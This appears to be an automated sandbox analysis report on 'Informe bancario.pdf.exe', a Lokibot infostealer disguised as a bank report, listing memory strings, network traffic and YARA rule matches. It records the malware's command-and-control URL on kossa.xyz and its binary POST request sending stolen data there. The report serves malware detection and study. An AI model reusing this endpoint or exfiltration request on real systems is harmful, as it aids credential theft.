              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:56:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ze9NFrHZ9IrfuGLxpPvBcSsLm0UomgLk8jPtdqquFlynktDCPfbpkVpR%2FYw4hD7WEGv%2B0MUqREfXG6Kk%2Bqj5B0rKQEMEfEOGC4RuR2zK%2F7ISS9%2Fj4ptzO%2FJudJo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe69478bbf9962-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:56:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S1WHOas3vJ7ZFYUp%2FoVVUCVxkbE%2B%2Fp%2B49GWBt85%2By8aInE%2Fgiju3xDMXtJloEZtOOoh0Qkt1%2FZQmQhzHs1QcSgmJ3isNDFUTbBPQR%2BKK%2FfS%2FNBvX4LpQuHNNmZ8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe69510ec4909d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:56:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=omOyIa%2FbwaXPJ05s%2FswmCZgfnEZ7LUKirOKbYW7ZqLOA%2BDqopKYCA80lwyTggiJdFJRy5LHqQXRYDuDGIw%2FBTrZq3IZvAVcLr9l98RagC6y3fNEi8XGjdLs5zR0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe695e4dcc76c5-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:56:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OxjygSRG8X%2FkV9bKGg9vKcukGQQMsZciUlD4EA%2FbKAdKhbAsUZHriNrmaDnwEjlvhCO2v0dr40IU6hwQz7EKgiICOz%2FwZ8BGMfZL6ripgHen%2FVFAblBWSK3ZE5M%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe697a2bb27774-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:56:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vKWHn%2FyKZfK22jYwkSiqKJ3lNebyDNlMqc2uTH%2FWPL1CsEeS2wXJq7O8RBu3uo9kCAL4JgpjGnEOG2LPOeL7%2BiITMPF9gEE91z1aYp%2FlObWTDWMy78vsHq6Twg0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe698938c9903a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:56:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ndR9ZCTJ1N11vjX%2Fx0YEz6iEdBcRwRBrFLR63RkojfAusVr7m8LQjcOnDZVKgChgIGzkLUZ6xRoemhHdLPRFdThTivALoGspyfOiDAiawxUfm5e3PqNs0e6Xj8o%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe699a38fd8926-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:56:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GvokBvlFU7rHymLkT5aDrY0YFW9JOrqKdEQDAYp28XRPOV9nTidnZuNJsuZx2Ecpe%2BgluEOIUHEw87efs71zeLfR5jQPOg72GppPSuamirQio2LGHZU2xFJ7Yd4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe69addd1cbbcb-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:56:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=49za7TeTSY%2BScp3L3mbuGYQSzA8lKA0u3%2ByMCtjhTcKDSwymE1%2FJodRsLTRHciEX8Kq0Ra9aNOm%2Ffy2I42Ob1ewYWyfNEryyYANBw%2BmQa%2BV%2F4yBU3%2BqCKwbOKrI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe69bfdc4a4052-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:56:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QtFAq1al83O%2FV%2B92iHB%2Bvj41q9z52fvvYULnr9pnDvcrgcXCZbRd%2Fg8PwqQ5%2B7osAmwSr8ZWHiJJHImkp%2FDMHhxFGmlMluudAzgI7dcN3u2RlpiJ3WS3kpCUnMU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe69c5cf035bdd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
              Source: Informe bancario.pdf.exe, 00000005.00000002.523820442.00000000004A0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://kossa.xyz/esi/pp/play.php
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.259547063.0000000005761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: Informe bancario.pdf.exe, 00000000.00000002.294664129.0000000005750000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: Informe bancario.pdf.exe, 00000000.00000002.294664129.0000000005750000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comce
              Source: Informe bancario.pdf.exe, 00000000.00000002.294664129.0000000005750000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comm
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: Informe bancario.pdf.exe, 00000000.00000003.266552640.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.268164390.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267203188.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267404179.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266370808.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.268040307.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.265954001.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266622693.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.265897828.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266080343.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266290134.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266967198.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267554490.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266128541.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267148330.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267028927.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266471528.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267458378.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267763841.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266216146.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267060843.000000000578D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmG
              Source: Informe bancario.pdf.exe, 00000000.00000003.258511329.0000000005756000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: Informe bancario.pdf.exe, 00000000.00000003.258511329.0000000005756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.krF
              Source: Informe bancario.pdf.exe, 00000000.00000003.258511329.0000000005756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.krZ
              Source: Informe bancario.pdf.exe, Informe bancario.pdf.exe, 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: Informe bancario.pdf.exe, 00000000.00000003.260884494.0000000005752000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: Informe bancario.pdf.exe, 00000000.00000003.260884494.0000000005752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: Informe bancario.pdf.exe, 00000000.00000003.258511329.0000000005756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.krE
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
              Source: Informe bancario.pdf.exe, 00000000.00000003.257122280.000000000576B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comU
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: unknownHTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 190Connection: close
              Source: unknownDNS traffic detected: queries for: kossa.xyz
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 5_2_00404ED4 recv,
              Source: Informe bancario.pdf.exe, 00000000.00000002.292050279.0000000000C08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              System Summary

              barindex
              Source: 0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.Informe bancario.pdf.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.Informe bancario.pdf.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.Informe bancario.pdf.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.Informe bancario.pdf.exe.400000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.Informe bancario.pdf.exe.400000.12.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.Informe bancario.pdf.exe.400000.12.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.Informe bancario.pdf.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.Informe bancario.pdf.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.Informe bancario.pdf.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.Informe bancario.pdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.Informe bancario.pdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.Informe bancario.pdf.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.Informe bancario.pdf.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.Informe bancario.pdf.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.Informe bancario.pdf.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.Informe bancario.pdf.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.Informe bancario.pdf.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.Informe bancario.pdf.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.Informe bancario.pdf.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.Informe bancario.pdf.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.Informe bancario.pdf.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.Informe bancario.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.2.Informe bancario.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.2.Informe bancario.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.Informe bancario.pdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.Informe bancario.pdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.Informe bancario.pdf.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.Informe bancario.pdf.exe.400000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.Informe bancario.pdf.exe.400000.14.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.Informe bancario.pdf.exe.400000.14.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.Informe bancario.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.2.Informe bancario.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.2.Informe bancario.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.Informe bancario.pdf.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.Informe bancario.pdf.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.Informe bancario.pdf.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
              Source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.293368296.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
